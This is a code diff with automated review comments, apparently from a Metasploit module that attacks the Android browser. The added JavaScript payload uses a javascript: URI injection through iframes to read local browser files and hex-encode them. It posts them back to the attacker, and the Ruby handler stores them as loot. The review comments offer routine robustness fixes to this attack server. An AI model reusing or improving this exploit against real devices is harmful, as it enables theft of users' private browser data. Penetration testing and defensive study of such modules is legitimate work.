@@ -64,13 +64,14 @@ def on_request_uri(cli, request)
64
64
65
65
def process_post ( cli , request )
66
66
data = JSON . parse ( request . body )
67
+ contents = hex2bin ( data [ 'data' ] )
67
68
file = File . basename ( data [ 'url' ] )
68
- print_good "File received: #{ request . body . length . to_f /1024 } kb #{ file } "
69
+ print_good "File received: #{ ( contents . bytesize . to_f /1000 ) . round ( 2 ) } kb #{ file } "
69
70
loot_path = store_loot (
70
71
file ,
71
72
'application/x-sqlite3' ,
72
73
cli . peerhost ,
73
- data ,
74
+ contents ,
74
75
File . basename ( data [ 'url' ] ) ,
75
76
"#{ cli . peerhost . ljust ( 16 ) } Android browser file"
76
77
)
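Review bot: `data['data']` and `data['url']` are used without any shape check, and this body comes from whichever client posts to the handler. A body that is not the expected JSON object raises out of `process_post`: `JSON.parse` raises `JSON::ParserError`, a missing `data` key reaches `hex2bin(nil)`, and a missing `url` reaches `File.basename(nil)`. I would rescue `JSON::ParserError` around the parse and add `return unless data.is_a?(Hash) && data['data'].is_a?(String) && data['url'].is_a?(String)` before the `hex2bin` call. The fifth `store_loot` argument repeats `File.basename(data['url'])` and could reuse `file`. The method's closing `end` is outside this hunk.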
@@ -125,8 +126,11 @@ def exploit_js
125
126
'var t=function(){setTimeout(function(){next(urls.shift());},1)};window.onmessage=t;'+
126
127
'var next=(function(url){if(!url)return;try{var f = document.createElement("iframe");f.src=url;f.onload=f'+
127
128
'unction(){f.onload=null;document.documentURI="javascript://hostname.com/%250D%250Ax=new '+
128
- 'XMLHttpRequest;x.open(String.fromCharCode(71,69,84),location.href);x.send();x.onload=fun'+
129
- 'ction(){ top.postMessage({data:x.responseText,url:location.href}, String.fromCharCode(42));'+
129
+ 'XMLHttpRequest;x.open(String.fromCharCode(71,69,84),location.href);x.responseType=String.fromCharCode(97,'+
130
+ '114,114,97,121,98,117,102,102,101,114);x.send();x.onload=function(){window.onerror=alert;'+
131
+ 'var buff = new Uint8Array(x.response);var hex = Array.prototype.map.call(buff, function(d)'+
132
+ '{var c = d.toString(16);return (c.length < 2) ? 0+c : c;}).join(new String); top.postMessa'+
133
+ 'ge({data:hex,url:location.href}, String.fromCharCode(42));'+
130
134
'parent.postMessage(1,String.fromCharCode(42));};x.onerror=function(){parent.postMessage(1,S'+
131
135
'tring.fromCharCode(42))};";f.contentWindow.location = "";};document.body.appendChild(f);}catch(e){t();}});t();';
132
136
brokenFrame.contentWindow.location = "";
@@ -136,4 +140,9 @@ def exploit_js
136
140
|
137
141
end
138
142
143
+ # TODO: Make this a proper Rex::Text function
144
+ def hex2bin ( hex )
145
+ hex . chars . each_slice ( 2 ) . map ( &:join ) . map { |c | c . to_i ( 16 ) } . map ( &:chr ) . join
146
+ end
147
+
139
148
end
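Review bot: `hex2bin` accepts any string, so malformed input is stored as if it were valid file contents. `to_i(16)` returns 0 for a pair that is not hex, which turns it into a NUL byte without any error, and an odd-length string decodes its last nibble as a full byte. I would validate first with `raise ArgumentError, 'invalid hex' unless hex =~ /\A(?:\h\h)*\z/` and then decode with `[hex].pack('H*')`, which replaces the four-stage chain and returns a binary string. The helper would also benefit from a short comment saying it expects an even-length, lowercase-or-uppercase hex string and returns raw bytes.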